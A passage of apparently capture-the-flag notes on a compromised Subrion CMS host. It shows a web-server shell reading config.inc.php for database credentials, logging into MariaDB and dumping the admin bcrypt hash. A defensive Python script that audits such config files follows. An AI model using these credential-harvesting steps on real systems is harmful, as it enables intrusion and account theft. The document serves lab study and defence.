MySQL


Checking for DB credentials after performing manual system enumeration

www-data@exfiltrated:/var/www/html/subrion$ cat /var/www/html/subrion/includes/config.inc.php
<?php
/*
 * Subrion Open Source CMS 4.2.1
 * Config file generated on 10 June 2021 12:04:54
 */
 
define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', 'target100');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306');
define('INTELLI_DBPREFIX', 'sbr421_');
 
define('IA_SALT', '#5A7C224B51');
 
// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);

DB credentials identified: subrionuser:target100

www-data@exfiltrated:/var/www/html/subrion$ mysql -usubrionuser -ptarget100
mysql -usubrionuser -ptarget100
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 177736
Server version: 10.3.29-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> use subrion;
use subrion;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
MariaDB [subrion]> 

Session established

MariaDB [subrion]> select username,password from sbr421_members;
select username,password from sbr421_members;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$yLtIS38vqzWRmZPY3RxqsetMJRRi6VzaiKdCU53R/bpa4AHhXyZ6G |
+----------+--------------------------------------------------------------+
1 row in set (0.000 sec)

Password is admin N/A
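
A defender-side audit of the two artifacts seen above, the config.inc.php define() block and the bcrypt value in the members table. This is an added example, not part of the original notes or of Subrion itself; the function names, the MIN_DB_PASSWORD_LEN threshold and the sample values are assumptions.

```python
import os
import re
import stat
import tempfile

# Matches define('NAME', 'string'); and define('NAME', 123); as in config.inc.php
DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*(?:'([^']*)'|(\d+))\s*\)\s*;")
# bcrypt modular-crypt format: $2y$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$(2[abxy])\$(\d{2})\$[./A-Za-z0-9]{53}$")
MIN_DB_PASSWORD_LEN = 12  # assumed policy threshold, adjust to local policy

def parse_defines(php_text):
    """Return {constant: value} for simple define() lines (PHP comments are not stripped)."""
    values = {}
    for name, text, number in DEFINE_RE.findall(php_text):
        values[name] = int(number) if number else text
    return values

def audit_config(path):
    """Return a list of findings for a Subrion-style config file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(f"{path} is world-readable (mode {mode:o})")
    with open(path, encoding="utf-8") as fh:
        cfg = parse_defines(fh.read())
    password = cfg.get("INTELLI_DBPASS")
    if isinstance(password, str) and len(password) < MIN_DB_PASSWORD_LEN:
        findings.append(f"INTELLI_DBPASS is shorter than {MIN_DB_PASSWORD_LEN} characters")
    if cfg.get("INTELLI_DBUSER") == "root":
        findings.append("application connects to the database as root")
    if cfg.get("INTELLI_DEBUG") == 1:
        findings.append("INTELLI_DEBUG is enabled")
    return findings

def bcrypt_cost(hash_value):
    """Return the bcrypt work factor, or None if the value is not a bcrypt hash."""
    match = BCRYPT_RE.match(hash_value)
    return int(match.group(2)) if match else None

if __name__ == "__main__":
    # Constructed sample config with placeholder values (not the file from the notes).
    sample = ("<?php\ndefine('INTELLI_DBUSER', 'exampleuser');\n"
              "define('INTELLI_DBPASS', 'example1');\ndefine('INTELLI_DEBUG', 1);\n")
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "config.inc.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(sample)
        os.chmod(path, 0o644)
        for finding in audit_config(path):
            print("FINDING:", finding)
    print("bcrypt cost:", bcrypt_cost("$2y$10$" + "." * 53))  # constructed hash
```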